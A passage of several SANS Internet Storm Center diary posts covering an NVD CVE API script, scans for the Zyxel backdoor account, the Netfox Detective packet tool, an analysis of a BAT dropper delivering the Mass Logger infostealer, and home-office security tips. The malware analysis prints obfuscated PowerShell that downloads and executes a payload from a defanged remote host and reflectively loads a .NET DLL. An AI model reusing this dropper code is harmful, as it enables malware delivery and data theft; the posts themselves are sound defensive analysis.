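The "rinse and repeat" over all of your CPEs is then just a loop; a sketch, where cpe-inventory.txt is a hypothetical file with one CPE match string per line:

$allCVEs = foreach ($cpe in (get-content .\cpe-inventory.txt)) {
    $request = "https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=$cpe"
    (invoke-webrequest $request | ConvertFrom-Json).result.CVE_items.cve.CVE_data_meta.id
}
$allCVEs | sort-object -unique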

While this is starting to get useful, keep in mind that it's only as good as the database.  For instance, any particular product will have been written in some language, likely with some libraries, maybe a framework and some other components.  There isn't a team of elves drawing up that hierarchy for public consumption anywhere.  We can only hope that the dev team who wrote the thing is keeping that list for their own use! (hint – lots of them are not).

You can deconstruct any particular application to some degree ( https://isc.sans.edu/forums/diary/Libraries+and+Dependencies+It+Really+is+Turtles+All+The+Way+Down/20533/ ), but if you go that deep, you'll find that your list will likely see components get added or removed from version to version – it'll turn into a whack-a-mole-science-project in no time!
For a point-in-time application pentest this can be useful, but to just keep tabs on how your security posture is from week to week, you'll likely find yourself spending more time on application archeology than it's worth.

All is not lost though – as we've seen above, we can get useful information just at the application level.  And keep in mind that the CVE list is what your scanner uses as its primary source – as do your red team, your malware, and any "hands on keyboard" attackers that your malware escorts onto your network.  So while the CVE list will never be complete, it's the data all of your malicious actors go to first.

Let's dig deeper into this – with our inventory of CPEs now solid, tomorrow we'll play more with the API details at the CVE level, and on Monday there'll be a full working app (I promise!) that you can use in your organization.

==== of note ====

In the course of playing with this API, I ended up opening a case with the folks at NIST. They were very responsive (2-day turnaround from initial question to final answer), which is impressive, especially for a free product!

===============
References:

Full docs for CVE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

===============
Rob VandenBrink
rob@coherentsecurity.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans for Zyxel Backdoors are Commencing., (Wed, Jan 6th)


It was the day (or two days, actually) before Christmas when Niels Teusink published a blog post about a backdoor in various Zyxel products [1]. Niels originally found the vulnerability in Zyxel's USG40 security gateway, but it of course affects all Zyxel devices using the same firmware. According to Zyxel, the password was used "to deliver automatic firmware updates to connected access points through FTP" [2]. So in addition to using a fixed password, it appears the password was also sent in the clear over FTP.

Zyxel products are typically used by small businesses as firewalls and VPN gateways ("Unified Security Gateway"). There is little in terms of defense in depth that can be applied to protect the device, and ssh and the VPN endpoint (via HTTPS) are often exposed. The default credentials found by Niels are not just limited to FTP: they can be used to access the device as an administrator via ssh.

So yet again, we do have a severe "stupid" vulnerability in a device that is supposed to secure what is left of our perimeter.

Likely due to the holidays, and maybe because Niels did not initially publish the actual password, widespread exploitation via ssh did not start until now. But we are now seeing attempts to access our ssh honeypots via these default credentials.

The scans started on Monday afternoon (I guess they first had to adapt their scripts in the morning), initially mostly from 185.153.196.230. On Tuesday, 5.8.16.167 joined in on the fun, and finally today we have 45.155.205.86. The last IP has been involved in scanning before.

What can/should you do?

  • If you are using affected devices: UPDATE NOW. See Zyxel's advisory [2]. Please call Zyxel support if you have questions.
  • If you are using any kind of firewall/gateway/router, no matter the vendor, limit its admin interface exposure to the minimum necessary. Avoid exposing web-based admin interfaces. Secure ssh access as best you can (public keys…). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes vendors choose to hide ssh keys instead of passwords.
  • Figure out a way to automatically get alerts if a device is running out-of-date firmware. Daily vulnerability scans may help. Automatic firmware updates, if they are even an option, are often considered too risky for a perimeter device.
  • If you are a vendor creating these devices: get your act together. It is ridiculous how many "static keys", "support passwords" and simple web application vulnerabilities are found in your "security" devices. Look over the legacy code and do not rely on independent researchers to do your security testing.

And as a side note for Fortinet users, see what the new year just got you:

https://www.fortiguard.com/psirt?date=01-2021 . 

 

[1] https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html

[2] https://www.zyxel.com/support/CVE-2020-29583.shtml


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Netfox Detective: An Alternative Open-Source Packet Analysis Tool , (Tue, Jan 5th)


[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

Various digital forensic artifacts are generated during intrusions and malware infections. Other than analyzing endpoint logs, memory and suspicious binaries, network packet captures offer a trove of information to incident handlers that could help them triage incidents quickly (such as determining if sensitive data had been exfiltrated). Popular tools such as Wireshark, Ettercap, NetworkMiner or tcpdump are often used by incident handlers to analyze packet captures. However, there could be situations where a tool is unable to open a packet capture due to its size or deliberate tampering (perhaps in Capture-the-Flag (CTF) challenges, to increase difficulty and complexity). As such, being proficient in multiple alternative tools for packet analysis could come in handy, be it for handling incidents or for CTF challenges.

I recently came across an open-source tool for packet analysis named Netfox Detective [1], developed by the Networked and Embedded Systems Research Group at Brno University of Technology [2]. To showcase some of its features, I mainly used the packet capture created in my previous diary [3]. Firstly, with reference to Figure 1, a workspace needs to be created. As the name implies, the created workspace will contain artifacts such as packet captures or logs that would be analyzed (in this example, I only used network packet captures and did not import any logs).

Figure 1: Creation of Workspace for Analysis

Following that, I imported the network packet capture created in my previous diary [3], and Figure 2 shows an overview of the statistics of the packet capture. One interesting observation: I had not realized that some packet loss occurred during the capture I made previously. It was also interesting to note that Netfox Detective utilizes TCP heuristics that the creators previously developed and improved on to mitigate corrupted or missing packets, so as to collate as many network conversations as possible [4].

Figure 2: Overview of NAT Slipstreaming Packet Capture

As compared to Wireshark, where packets are displayed linearly, Netfox Detective has a tabbed view and displays the packets at Layer 3, Layer 4 and Layer 7 (a linear option is also available by selecting the “Frames” tab). Figure 3 shows the Layer 4 tab selected and the corresponding results displayed.

Figure 3: Netfox Detective displaying Layer 4 Network Traffic

Selecting a conversation (highlighted in Figure 3) will add the selection to the “Conversation explorer” pane (highlighted by the red box in Figure 4). Double-clicking the entry in “Conversation explorer” will create a new “Conversation detail” tab where a summary of the interaction is displayed (as shown in Figure 4). I found the Packet Sequence Chart very useful, as it visualizes when the various packets were transmitted with respect to their frame size.

Figure 4: Conversation detail view of 192.168.211.132 and 192.168.2.1

Following that, with reference to Figure 5, I selected frame number 336 for an in-depth look, and we can see the ACK and RST flags being reflected in this packet (an expected finding, as per the observations of the NAT Slipstreaming experiment I did previously).

Figure 5: Frame content view of Frame Number 336

There could be instances where analysis of multiple related network packet captures is needed in an incident. Netfox Detective allows multiple packet capture files to be imported into the same workspace (as shown in Figure 6). Here, I used another packet capture created by Brad Duncan [5] to demonstrate the feature.

Figure 6: Importing Multiple Packet Capture Files into the Same Workspace

As always, there are strengths and weaknesses in the various tools we use for packet analysis. Netfox Detective can only be installed on Microsoft Windows (Windows Vista SP2 or newer), and supports a smaller subset of protocols compared to other tools such as Wireshark [1]. However, the various tabbed views at Layers 3, 4 and 7, the packet visualizations and the ability to group related packet captures in the same workspace offer a refreshing perspective for incident handlers performing analysis/triage on network packet captures. Moreover, the open-source nature of Netfox Detective allows further enhancements to the tool itself.

For a complete read about Netfox Detective’s design decisions and technical implementations, their published paper is available here [4]. To download Netfox Detective, the information can be found on their GitHub page [1].

[1] https://github.com/nesfit/NetfoxDetective/
[2] https://nesfit.github.io/
[3] https://github.com/poppopretn/ISC-diaries-pcaps/blob/main/2020-11-NAT-Slipstream.zip
[4] https://doi.org/10.1016/j.fsidi.2020.301019
[5] https://www.malware-traffic-analysis.net/2020/11/10/index.html 
 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

From a small BAT file to Mass Logger infostealer, (Mon, Jan 4th)


Since another year went by, I’ve decided to once again check all of the malicious files which were caught in my e-mail quarantine during its course. Last year, when I went through the batch of files from 2019, I found a couple of very large samples[1] and I wanted to see whether I’d find something similar in the 2020 batch.

I started with just over 900 files of many different types, and although I did notice a couple of unusually large files when one took their extensions into consideration (e.g. a JS file with size exceeding 1 MB, which turned out to be a sample of WSH RAT[2]), the largest sample in the batch overall was an EXE with a size of 17 MB. It was not small by any means, but its size was not too unusual either – it was definitely not in the same weight class as the 130 MB executable sent to us by one of our readers back in August[3].

On the other side of the size spectrum, the situation was pretty much the same – there weren’t any files which would be interesting because of their exceptional size (or lack thereof). While quickly going over the small files, however, one of them did catch my eye. Among the smallest executable scripts was a 1.68 kB BAT file from September 2020 with the name “A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat” (the first part roughly translates as “Terms of agreement” from Hungarian), which contained the following slightly obfuscated PowerShell script, which turned out to be quite interesting.

@echo off

Start /MIN Powershell -WindowStyle Hidden -command "$Dxjyp='D4@C7@72@72...
...
...F6@26@45@42';
$text =$Dxjyp.ToCharArray();
[Array]::Reverse($text);
$tu=-join $text;
$jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))};
$jm -join ''|I`E`X"

After reversing and decoding the contents of the $Dxjyp variable, the main body of the script became readable. The script was supposed to download and execute the contents of the file A12.jpg, downloaded from http[:]//topometria[.]com[.]cy.

$Tbone='*EX'.replace('*','I');
sal M $Tbone;
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);
$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $p22;
$mv='(N'+'ew'+'-O'+'b'+'je'+'c'+'t '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''http[:]//topometria[.]com[.]cy/A12.jpg'')'|I`E`X;
$asciiChars= $mv -split '-' |ForEach-Object {[char][byte]"0x$_"};
$asciiString= $asciiChars -join ''|M

The URL contained within the script is no longer active, but I managed to find a copy of the A12.jpg file downloaded in an Any.Run task from September, in which someone analyzed a differently named (but functionally identical) version of the batch script[4].

The JPG file (which was, of course, not a JPG at all) was 3.25 MB in size. This turned out not to be too much when one considers that it contained the main malicious payload in the form of one EXE and one DLL. But before we get to these files, let’s quickly take a look at A12.jpg.

Its contents looked exactly as one would expect given the last two lines of the PowerShell code we’ve seen above (i.e. hex-encoded ASCII characters separated by hyphens).

24-74-30-3D-2D-4A-6F-69-6E-20-28-28-31-31-...
...
... 0D-0A-20-20-0D-0A-0D-0A-0D-0A-20-20

At this point, it is good to mention that for the purposes of analyzing potentially malicious code, it can be invaluable to remember the hex values of several ASCII characters. Besides the usual “M” (0x4D) and “Z” (0x5A), which form the header of Windows PE executables, and a couple of others, it may be a good idea to also remember that “$” has the hex value 0x24. That way, even if we got our hands on the A12.jpg file without any other context, we might deduce that it contains code in one of the languages in which the dollar sign is used to denote variables.
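
To illustrate, decoding such hyphen-separated hex is a PowerShell one-liner; fed the first bytes of A12.jpg shown above, it returns “$t0=-Join”, which is exactly how the decoded script below begins:

-join ('24-74-30-3D-2D-4A-6F-69-6E' -split '-' | ForEach-Object { [char][Convert]::ToInt32($_, 16) })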

After decoding the downloaded file, it became obvious that it did indeed contain a part of a PowerShell script. What was especially interesting about it were two variables which seemed to each contain a PE structure.

$t0=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});
sal g $t0
[String]$nebj='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^...
...
...>^'.replace('>^','00')

function PuKkpsGJ {
    param($gPPqxvJ)
    $gPPqxvJ = $gPPqxvJ -split '(..)' | ? { $_ }
    ForEach ($wbdtbuBT in $gPPqxvJ){
        [Convert]::ToInt32($wbdtbuBT,16)
    }
}
[String]$CDbvWcpeO='4D5A9>^>^3>^>^>^04>^>^>^FFFF>^>^B8>^...
...
...>^'.replace('>^','00')

[Byte[]]$JJAr=PuKkpsGJ $CDbvWcpeO
$y='[System.Ap!%%%%#######@@@@@@@****************ain]'.replace('!%%%%#######@@@@@@@****************','pDom')|g;
$g55=$y.GetMethod("get_CurrentDomain")
$uy='$g55.In!%%%%#######@@@@@@@****************ke($null,$null)'.replace('!%%%%#######@@@@@@@****************','vo')| g
$vmc2='$uy.Lo!%%%%#######@@@@@@@****************($JJAr)'.Replace('!%%%%#######@@@@@@@****************','ad')
$vmc2| g
[Byte[]]$nebj2= PuKkpsGJ $nebj
[g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',$nebj2)

Indeed, after replacing all of the “>^” pairs in the two variables with “00” and saving the resultant values from each of the variables in a file, the hypothesis was proven true. There were indeed two PE files contained within the script – one 42 kB DLL and one 514 kB EXE, both written in the .NET family of languages.

After a little more deobfuscation of the script in A12.jpg, it became obvious that it basically amounted to the following two lines of code, in which the purpose of the two files can be clearly seen – the script was supposed to load the DLL into memory and then ensure execution of the main malicious executable with its help.

[System.AppDomain].GetMethod("get_CurrentDomain").Invoke($null,$null).Load([DLL file])| IEX
[g8fg0000.gfjhfdgpoerkj]::gihjpdfg('InstallUtil.exe',[EXE file])

Indeed, you may see the relevant part of the DLL in the following image.

After a quick analysis, the EXE file itself turned out to be a sample of the Mass Logger infostealer.

Although I didn’t find any exceptionally large or small malicious files in the batch of quarantined e-mails from 2020, the small BAT file discussed above turned out to be quite interesting in its own way, as the following chart summarizes.

Let us see what 2021 brings us in terms of malware – perhaps next year, we will have a chance to take a look at something exceptionally small or unusually large again…

Indicators of Compromise (IoCs)

A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat (1.68 kB)
MD5 – 71bdecdea1d86dd3e892ca52c534fa13
SHA1 – 72071a7e760c348c53be53b6d6a073f9d70fbc4b

A12.jpg (3.25 MB)
MD5 – 60b86e4eac1d3eeab9980137017d3f65
SHA1 – d41b417a925fb7c4a903dd91104ed96dc6e1982b

ManagmentClass.dll (42 kB)
MD5 – 8a738f0e16c427c9de68f370b2363230
SHA1 – 0ac18d2838ce41fe0bdc2ffca98106cadfa0e9b5

service-nankasa.com-LoggerBin.exe (514 kB)
MD5 – 4b99184764b326b10640a6760111403d
SHA1 – 2a61222d0bd7106611003dd5079fcef2a9012a70

[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718
[2] https://app.any.run/tasks/801cb6a1-6c66-4b98-8b38-14b3e56d660a/
[3] https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/
[4] https://app.any.run/tasks/32b4519f-3c10-40f5-a65a-7db9c3a57fd0/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Protecting Home Office and Enterprise in 2021, (Sat, Jan 2nd)


Because of COVID, 2020 saw a major shift from working at the "office" to working at home, which in turn shifted attacks to the user @home. Everything indicates that 2020 was a year of ransomware and COVID-19 themed campaigns. Without exception, phishing emails have been the most prolific initial attack vector targeting organizations and home users. This will likely get worse and more disruptive this coming year.

Past 14 Days – My IP Threat Intel Activity

Every year there are predictions on what we should expect in the coming year and what to watch for. Instead, let's ask: what can be done to secure the enterprise?

  • Implement multi-factor authentication
  • Extending security to a remote force
  • Review cloud security policies
  • Better protection for IoT
  • Ensure backups are secure and cannot be reached, to prevent attackers from finding and deleting them
  • Equally important – regularly test backups to ensure the data can be recovered
  • Use and share Threat Intel to track suspicious activity [1][2]
  • Better network analytics and log collection [3][4][5]
  • Monitor host and network activity [3][4][5]
  • Better detection and prevention against phishing email attacks [10]
  • Review and test employees against security awareness program [11]
  • Apply system security updates as soon as appropriate
  • Keep antivirus software current

Over the past year, one of the most difficult tasks has been detecting and preventing compromise via unmanaged devices. With a large population of employees working from a home office, some forced to use their personal devices, a compromised device has the potential of being used to exploit other systems in the home network as well as the enterprise-connected network (i.e. VPN access to the employer's network). This challenge will continue for the foreseeable future.

Share your predictions for 2021, what is going to keep you up at night?

[1] https://www.anomali.com/resources/staxx
[2] https://otx.alienvault.com
[3] https://www.elastic.co
[4] http://rocknsm.io
[5] https://securityonionsolutions.com
[6] https://us-cert.cisa.gov
[7] https://cyber.gc.ca
[8] https://www.ncsc.gov.uk
[9] https://www.enisa.europa.eu/topics/csirts-in-europe
[10] https://cyber.gc.ca/en/assemblyline
[11] https://www.sans.org/security-awareness-training?msc=main-nav

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
